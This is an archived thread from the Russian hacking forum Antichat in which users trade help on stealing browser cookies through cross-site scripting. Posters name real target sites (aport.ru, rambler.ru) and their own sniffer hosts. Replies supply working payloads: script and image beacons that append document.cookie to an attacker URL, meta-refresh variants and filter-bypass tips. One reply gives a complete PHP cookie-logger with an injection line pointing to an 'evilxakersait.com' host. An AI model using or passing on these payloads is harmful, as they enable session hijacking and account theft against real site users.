Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   xSs как отправить кукисы на (https://forum.antichat.xyz/showthread.php?t=33540)

Chakir 16.02.2007 21:13
xSs как отправить кукисы на
 
пробую так!
Код:
ssss"><script>alert('xss')</script>
всё ок выкибывает исправно!
пробую так
Код:
ssss"><script>alert(document.cookie)</script>
всё ок кидает куки!
пробуё так
Код:
ssss"><script>img = new Image(); img.src = "http://www.klub.h10.ru/snif/s.php?"+document.cookie;</script>
не канает!

как отправить кукисы на http://www.klub.h10.ru/snif/s.php

Robin_Hood 16.02.2007 21:26
скорее всего стоит ограничение на длину строки

Abra 16.02.2007 21:37
Исходный код смотри - что в нем получается.

Dagon 16.02.2007 22:03
попробуй так "><script src=http://site.com/js.js></script>

в js.js - img=new Image();img.src="http://sniffer.ru/s.gif?"+document.cookie;

o3,14um 16.02.2007 23:24
дай линк на сайт.
очень часто нужно писать +escape(document.cookie);

ya_mag 17.02.2007 00:39
может и мне кто поможет? нашол вот такой xss
<meta http-equiv=Refresh content=0;url=javascript:alert("OK")>
пишеш
<meta http-equiv=Refresh content=0;url=javascript:document.cookie> показывает куки...
делаю ссылку на фаил js.js на снифер ничего не приходит :(
ссылку делаю вот так
<meta http-equiv=Refresh content=0;url=javascript:http://my_site/js.js>
и вот так вот пробывал
<meta http-equiv=Refresh content=0;url=javascript:new Image();img.src="http://my_site/s.gif?"+document.cookie;>
может я неправильно ссылку ставлю?

GreenBear 17.02.2007 00:44
без javascript в url
и на хтмл страницу со скриптом

ya_mag 17.02.2007 01:25
Цитата:
Сообщение от Green_Bear
без javascript в url
без javascript просто открыват внутренность того чтонаписанно в js.js

Chakir 17.02.2007 15:11
народ вот xss на апорт.ру а как сделать чтобы она кукисы на http://www.klub.h10.ru/snif/s.php отсылала? логи смотреть тут http://www.klub.h10.ru/snif/log.php
помогите кто поможет таму +
кому помог я тот мне + =)
Код:
http://sm.aport.ru/scripts/template.dll?That=std&r=%22%3E%3Cscript%3Ealert%28%27XSS_by_Chakir%27%29%3C%2Fscript%3E

VampiRUS 24.02.2007 09:00
подскажте как провести xss, если все что идёт после "/" режется?

Sharky 25.02.2007 18:50
Попробуй заменить " на '

iSvt 19.02.2009 19:11
у меня ребят вопрос нашел вот
http://miss.rambler.ru/srch/?sort=0&set=miss&words="><script>alert(document.co okie)</script>
А как сделать чтобы куки пришли мне ведь ни один сниффер-то не пашет na-s.ru прикрыли
может кто напишет сниф

iddqd 19.02.2009 19:16
http://kanick.ru/sniffer/

iSvt 19.02.2009 20:35
смотрел но что-то не работает я паблик версию юзал
может пример какой-то даст

попугай 20.02.2009 00:29
Вот .. создаешь файл i.php на своем хосте пишешь туда

PHP код:
<?php
if(isset($_GET[1])){
$fp fopen("log.html""a+");
fwrite($fp'<h1>'.date('H:i:s d F Y').'</h1>'."\r\n".'<textarea rows=40 cols=150>'.$_GET[1].'</textarea><br><br>' "\r\n");
fclose($fp);
}
?>
там же создаешь файл log.html и права 777 ставишь...


А юзать так

PHP код:
<script>var d=documentd.write('<img width=0 src=http://evilxakersait.com/i.php?1='+escape(d.cookie)+'>')</script
http://evilxakersait.com твой сайт куда ты зальешь свой сниффер ...

вот что то в этом роде

Fepsis 20.02.2009 00:42
Юзаю вот этот снифер http://web-defence.ru/snif/


Время: 16:41